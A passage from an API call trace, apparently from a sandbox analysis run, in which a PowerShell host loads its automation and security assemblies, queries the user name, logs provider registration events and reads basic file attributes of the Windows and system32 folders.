	[0405.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.626] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0405.626] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0405.626] CoTaskMemFree (pv=0x1b97a6a0) 
	[0405.626] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0405.626] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0405.627] CoTaskMemFree (pv=0x41e820) 
	[0405.627] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31314d8*="Function", lpRawData=0x3131268) returned 1
	[0405.630] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0405.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.630] CoTaskMemFree (pv=0x46a6b0) 
	[0406.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.087] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0406.087] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0406.461] CoTaskMemFree (pv=0x1b97a6a0) 
	[0406.461] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0406.461] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0406.462] CoTaskMemFree (pv=0x41e820) 
	[0406.462] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3153d00*="Registry", lpRawData=0x3153a90) returned 1
	[0406.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0406.877] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0406.878] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0406.878] CoTaskMemFree (pv=0x1b97a6a0) 
	[0406.878] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0406.878] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0406.878] CoTaskMemFree (pv=0x41e820) 
	[0406.879] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3159118*="Variable", lpRawData=0x3158ea8) returned 1
	[0406.881] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0406.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.881] CoTaskMemFree (pv=0x46a6b0) 
	[0406.884] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0406.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.884] CoTaskMemFree (pv=0x46a6b0) 
	[0406.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0406.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0406.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0406.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0407.290] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0407.290] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d548 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d548) returned 0x1
	[0407.290] CoTaskMemFree (pv=0x1b97a6a0) 
	[0407.290] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0407.290] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d588 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d588) returned 1
	[0407.291] CoTaskMemFree (pv=0x41e820) 
	[0407.291] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x316cd30*="Certificate", lpRawData=0x316cac0) returned 1
	[0407.617] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.618] CoTaskMemFree (pv=0x46a6b0) 
	[0407.620] GetLogicalDrives () returned 0x4
	[0407.620] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0407.621] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0407.621] CoTaskMemAlloc (cb=0x20e) returned 0x465890
	[0407.621] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x465890 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0407.621] CoTaskMemFree (pv=0x465890) 
	[0407.623] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.623] CoTaskMemFree (pv=0x46a6b0) 
	[0407.623] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.623] CoTaskMemFree (pv=0x46a6b0) 
	[0407.638] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.638] CoTaskMemFree (pv=0x46a6b0) 
	[0407.639] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.639] CoTaskMemFree (pv=0x46a6b0) 
	[0407.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0407.640] SetErrorMode (uMode=0x1) returned 0x1
	[0407.640] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0407.640] SetErrorMode (uMode=0x1) returned 0x1
	[0407.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0407.640] SetErrorMode (uMode=0x1) returned 0x1
	[0407.640] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0407.641] SetErrorMode (uMode=0x1) returned 0x1
	[0407.641] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0407.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.641] CoTaskMemFree (pv=0x46a6b0) 
	[0407.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0407.646] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0407.646] SetErrorMode (uMode=0x1) returned 0x1
	[0408.073] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0408.073] SetErrorMode (uMode=0x1) returned 0x1
	[0408.073] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.073] SetErrorMode (uMode=0x1) returned 0x1
	[0408.073] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0408.073] SetErrorMode (uMode=0x1) returned 0x1
	[0408.073] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.074] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0408.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.074] SetErrorMode (uMode=0x1) returned 0x1
	[0408.074] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.074] SetErrorMode (uMode=0x1) returned 0x1
	[0408.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.074] SetErrorMode (uMode=0x1) returned 0x1
	[0408.074] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.074] SetErrorMode (uMode=0x1) returned 0x1
	[0408.074] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.075] SetErrorMode (uMode=0x1) returned 0x1
	[0408.075] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.075] SetErrorMode (uMode=0x1) returned 0x1
	[0408.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.075] SetErrorMode (uMode=0x1) returned 0x1
	[0408.075] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.075] SetErrorMode (uMode=0x1) returned 0x1
	[0408.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.076] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.076] SetErrorMode (uMode=0x1) returned 0x1
	[0408.076] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.076] SetErrorMode (uMode=0x1) returned 0x1
	[0408.076] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.076] SetErrorMode (uMode=0x1) returned 0x1
	[0408.076] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0408.076] SetErrorMode (uMode=0x1) returned 0x1
	[0408.076] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0408.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.077] SetErrorMode (uMode=0x1) returned 0x1
	[0408.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.077] SetErrorMode (uMode=0x1) returned 0x1
	[0408.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.077] SetErrorMode (uMode=0x1) returned 0x1
	[0408.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d190 | out: lpFileInformation=0x26d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.077] SetErrorMode (uMode=0x1) returned 0x1
	[0408.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0408.079] SetErrorMode (uMode=0x1) returned 0x1
	[0408.079] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d450 | out: lpFileInformation=0x26d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0408.079] SetErrorMode (uMode=0x1) returned 0x1
	[0408.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
